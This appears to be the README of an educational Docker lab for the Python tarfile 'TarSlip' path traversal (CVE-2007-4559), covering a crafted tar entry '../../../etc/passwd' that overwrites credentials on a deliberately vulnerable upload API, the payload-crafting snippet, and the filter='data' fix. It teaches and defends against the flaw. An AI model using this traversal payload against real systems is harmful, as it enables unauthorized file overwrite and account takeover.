Share
## https://sploitus.com/exploit?id=2C9F6234-51AA-5233-BB11-B19ADC668F01
# CVE-2007-4559 โ€” TarSlip: The 15-Year Directory Traversal

> **Educational use only.** This lab intentionally exploits file system vulnerabilities inside isolated Docker containers. Do not run on any system with sensitive data or in production environments.

A self-contained Docker lab that demonstrates **CVE-2007-4559** โ€” the infamous "TarSlip" vulnerability in Python's `tarfile` module โ€” through a concrete, end-to-end attack chain:

1. An attacker uploads a crafted tarball to a file upload API.
2. `extractall()` blindly writes a tar entry named `../../../etc/passwd` outside the extraction directory, overwriting the real system file.
3. The planted password grants the attacker access to a protected `/admin` endpoint.
4. The same attack is then run against a fixed API โ€” and blocked with one line of code.

---

## The vulnerability

Python's `tarfile.extractall()` faithfully reproduces every entry in a tar archive, including entries whose names contain `../` path traversal sequences. It was **never designed to be a security boundary**.

```
tar entry name : ../../../etc/passwd
extraction dir : /shared/uploads/a1b2c3d4/

resolved path  : /shared/uploads/a1b2c3d4/../../../etc/passwd
               = /etc/passwd   โ† system file overwritten
```

| Timeline | |
|---|---|
| **2007** | Bug reported to the Python security team |
| **2007 โ€“ 2022** | Marked "not a security issue" โ€” tarfile is "working as intended" |
| **2022** | Trellix researchers scan GitHub and find **350,000+ repos** calling `extractall()` on untrusted input |
| **2022** | Public disclosure. CVE-2007-4559 resurfaces. Industry-wide scramble. |
| **2023** | PEP 706 ships `filter='data'` in Python 3.12 โ€” the fix is a single argument |

---

## What the demo shows

The demo runs in three beats, each requiring a keypress to advance.

### Beat 1 โ€” Baseline

- `GET /admin` โ†’ **401**. The admin endpoint exists and is protected. The attacker does not know the password.
- Upload `innocent.tar.gz` โ†’ files land inside the sandbox directory. Everything looks normal.

### Beat 2 โ€” The Exploit

```
Attacker crafts tarslip_passwd.tar.gz
  โ””โ”€ entry: "../../../etc/passwd"
       content: admin:hacked:1001:...   โ† planted password
            โ”‚
            โ–ผ
  POST /upload  (multipart file upload)
            โ”‚
            โ–ผ
  extractall("/shared/uploads/{uuid}/")
  resolves "../../../etc/passwd" โ†’ /etc/passwd   โ† CVE-2007-4559
            โ”‚
            โ–ผ
  GET /admin   Authorization: Basic admin:hacked
            โ”‚
            โ–ผ
  HTTP 200 โ€” "Welcome, admin! You have full admin access."
  flag: CVE-2007-4559{tarslip_passwd_overwrite_to_admin_rce}
```

One HTTP POST. No shell. No RCE payload. Just a tar file.

### Beat 3 โ€” The Fix

The same tarball is uploaded to the fixed API, which passes `filter='data'` to `extractall()`. Python raises `tarfile.OutsideDestinationError` โ€” the traversal is blocked, `/etc/passwd` is untouched, and `/admin` stays locked.

```python
# Vulnerable โ€” default before Python 3.14
tar.extractall(extraction_dir)

# Fixed โ€” PEP 706 (Python 3.12+)
tar.extractall(extraction_dir, filter='data')
```

One argument. Fifteen years to ship.

---

## Architecture

Four services on an isolated Docker bridge network (`tarslip-net`). Nothing reaches the internet.

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚                    tarslip-net (bridge)                  โ”‚
โ”‚                                                          โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”      โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”‚
โ”‚  โ”‚  vulnerable-api โ”‚      โ”‚       file-server        โ”‚  โ”‚
โ”‚  โ”‚  python:3.11.3  โ”‚      โ”‚       nginx:alpine       โ”‚  โ”‚
โ”‚  โ”‚  port 8000      โ”‚      โ”‚       port 8080 (host)   โ”‚  โ”‚
โ”‚  โ”‚                 โ”‚      โ”‚                          โ”‚  โ”‚
โ”‚  โ”‚  POST /upload   โ”‚      โ”‚  Serves /shared over     โ”‚  โ”‚
โ”‚  โ”‚  GET  /admin    โ”‚      โ”‚  HTTP โ€” browse extracts  โ”‚  โ”‚
โ”‚  โ”‚  GET  /health   โ”‚      โ”‚  visually                โ”‚  โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜      โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ”‚
โ”‚           โ”‚  shared-storage volume     โ”‚                 โ”‚
โ”‚           โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜                 โ”‚
โ”‚                                                          โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”                                     โ”‚
โ”‚  โ”‚    attacker     โ”‚                                     โ”‚
โ”‚  โ”‚  python:3.12    โ”‚  (no host port โ€” internal only)     โ”‚
โ”‚  โ”‚                 โ”‚                                     โ”‚
โ”‚  โ”‚  craft_malicious.py  โ€” generates tarballs             โ”‚
โ”‚  โ”‚  demo.py             โ€” drives the demo                โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜                                     โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

| Service | Image | Role | Host port |
|---|---|---|---|
| `vulnerable-api` | `python:3.11.3-slim` | Flask upload API + `/admin` guarded by `/etc/passwd` auth | 8000 |
| `fixed-api` | `python:3.12-slim` | Same code + `USE_SAFE_EXTRACTION=true` | 8000 |
| `file-server` | `nginx:alpine` | Directory listing of extracted files | 8080 |
| `attacker` | `python:3.12-slim` | Payload generator + demo driver | โ€” |

The vulnerable and fixed APIs use **identical source code**. The only difference is the `USE_SAFE_EXTRACTION=true` environment variable on the fixed container, which flips the single `filter='data'` argument.

---

## Repository layout

```
CVE-2007-4559-lab/
โ”œโ”€โ”€ run_demo.sh                      โ† start here
โ”œโ”€โ”€ docker-compose.vulnerable.yml
โ”œโ”€โ”€ docker-compose.fixed.yml
โ”œโ”€โ”€ vulnerable-api/
โ”‚   โ”œโ”€โ”€ app.py                       # Flask API: /upload + /admin + /health
โ”‚   โ”œโ”€โ”€ Dockerfile                   # seeds admin:s3cr3t_Adm1nPass into /etc/passwd
โ”‚   โ””โ”€โ”€ requirements.txt
โ”œโ”€โ”€ file-server/
โ”‚   โ”œโ”€โ”€ Dockerfile
โ”‚   โ””โ”€โ”€ nginx.conf
โ””โ”€โ”€ attacker/
    โ”œโ”€โ”€ craft_malicious.py           # generates innocent.tar.gz + tarslip_passwd.tar.gz
    โ”œโ”€โ”€ demo.py                      # four-mode CLI driver (craft/baseline/exploit/verify)
    โ”œโ”€โ”€ Dockerfile
    โ””โ”€โ”€ requirements.txt
```

---

## Prerequisites

- **Docker** 20.10+ with the Compose plugin (`docker compose version`)
- **macOS / Linux** โ€” the shell script uses `bash`
- Ports **8000** and **8080** free on your host

---

## Running the demo

```bash
git clone https://github.com/your-username/CVE-2007-4559-lab.git
cd CVE-2007-4559-lab
bash run_demo.sh
```

The script is fully interactive. It prints a narrative before each step and waits for **Enter** to advance. No prior Docker knowledge is needed to follow along.

### What each pause point covers

| Pause | Narrative shown | Action on Enter |
|---|---|---|
| 1 | CVE timeline, what the three beats are | Build vulnerable stack |
| 2 | Container roles, seeded admin password | Generate payloads |
| 3 | What's inside each tarball | Beat 1 โ€” baseline |
| 4 | Why `/admin` is 401, what normal extraction looks like | Beat 2 โ€” exploit |
| 5 | The exact traversal math, what gets overwritten | Swap to fixed stack |
| 6 | What `filter='data'` does and why it works | Beat 3 โ€” verify |
| 7 | Key takeaways + broader ZipSlip pattern | Teardown |

### Running beats individually

If you want to step through manually:

```bash
# Vulnerable stack
docker compose -f docker-compose.vulnerable.yml up --build -d
docker compose -f docker-compose.vulnerable.yml exec attacker python craft_malicious.py
docker compose -f docker-compose.vulnerable.yml exec attacker python demo.py baseline
docker compose -f docker-compose.vulnerable.yml exec attacker python demo.py exploit

# Fixed stack
docker compose -f docker-compose.vulnerable.yml down
docker compose -f docker-compose.fixed.yml up --build -d
docker compose -f docker-compose.fixed.yml exec attacker python craft_malicious.py
docker compose -f docker-compose.fixed.yml exec attacker python demo.py verify

# Teardown
docker compose -f docker-compose.fixed.yml down
```

### Visual inspection

While the vulnerable stack is running, open [http://localhost:8080/uploads/](http://localhost:8080/uploads/) to browse the extracted session directories in your browser.

---

## How the `/admin` endpoint works

The API seeds a secret admin password into `/etc/passwd` at image build time:

```
admin:s3cr3t_Adm1nPass:1001:1001:Administrator:/home/admin:/bin/bash
```

`GET /admin` reads this file and checks the second field (password) against the HTTP Basic Auth credentials. The attacker doesn't know `s3cr3t_Adm1nPass` โ€” but after TarSlip overwrites the file with their own version containing `admin:hacked`, they do.

This is a simplified model of real-world targets: SSH `authorized_keys`, application config files, cron jobs, and any credential file the web process can write.

---

## How the payloads are crafted

`craft_malicious.py` uses Python's own `tarfile` module โ€” the same one that has the bug:

```python
def _add_entry(tar, name, content):
    info = tarfile.TarInfo(name=name)   # name is the traversal path
    info.size = len(content)
    tar.addfile(info, io.BytesIO(content))

# Entry name resolves to /etc/passwd when extracted into /shared/uploads/{uuid}/
_add_entry(tar, "../../../etc/passwd", malicious_passwd_content)
```

No special tools. No binary exploitation. The standard library is both the weapon and the victim.

---

## The fix explained

Python 3.12 introduced `filter=` in PEP 706. The `'data'` filter:

- Rejects entries that resolve outside the destination directory
- Strips setuid/setgid bits
- Ignores device files and hard links to unsafe paths
- Raises `tarfile.OutsideDestinationError` on traversal attempts

```python
# Before (vulnerable โ€” still the default until Python 3.14)
with tarfile.open(path) as tar:
    tar.extractall(dest)

# After (safe)
with tarfile.open(path) as tar:
    tar.extractall(dest, filter='data')
```

For Python 3.11 and earlier, validate manually:

```python
import os

def safe_extract(tar, dest):
    dest = os.path.realpath(dest)
    for member in tar.getmembers():
        member_path = os.path.realpath(os.path.join(dest, member.name))
        if not member_path.startswith(dest + os.sep):
            raise ValueError(f"Unsafe path: {member.name}")
    tar.extractall(dest)
```

Static analysis: `bandit` rule **B202** flags unsafe `extractall()` calls in CI.

---

## Broader impact โ€” ZipSlip

TarSlip is Python's name for a class of vulnerability that exists in every language with archive extraction APIs:

| Language | Vulnerable API | CVE / Advisory |
|---|---|---|
| Python | `tarfile.extractall()` | CVE-2007-4559 |
| Java | `ZipInputStream` | ZipSlip (2018) |
| Go | `archive/zip` | ZipSlip (2018) |
| .NET | `ZipArchive` | ZipSlip (2018) |
| Node.js | `tar`, `adm-zip`, others | ZipSlip (2018) |

Same root cause everywhere: trusting paths from untrusted archives. Same fix everywhere: canonicalize and validate before writing.

---

## Audience variations

### Developer audiences
Focus on the before/after code diff and the `bandit` B202 rule. The goal is "how do we prevent this in our codebase?" โ€” show the PEP 706 migration guide and how to add the check to CI.

### Security audiences
Focus on the Trellix disclosure methodology โ€” how they searched GitHub at scale, estimated impact across 350,000 repos, and navigated responsible disclosure for a vulnerability this widespread.

### CTF audiences
Extend `craft_malicious.py` to plant an SSH `authorized_keys` file or a malicious cron entry instead of `/etc/passwd`. Same technique, different targets โ€” shows that any writable path is an attack surface.

---

## References

- [NVD โ€” CVE-2007-4559](https://nvd.nist.gov/vuln/detail/CVE-2007-4559)
- [PEP 706 โ€” Filter for tarfile.extractall](https://peps.python.org/pep-0706/)
- [Trellix โ€” "15 Years Later: On the Dangers of Zip/Tar Slip"](https://www.trellix.com/en-us/about/newsroom/stories/research/tarslip.html)
- [Python issue tracker โ€” bpo-21109](https://bugs.python.org/issue21109) (the original 2007 report)
- [Bandit B202](https://bandit.readthedocs.io/en/latest/plugins/b202_tarfile_unsafe_members.html)
- [Snyk ZipSlip advisory](https://security.snyk.io/research/zip-slip-vulnerability)

---

## License

MIT โ€” use freely for education, security research, and conference demos. Do not use the payload generation techniques against systems you do not own.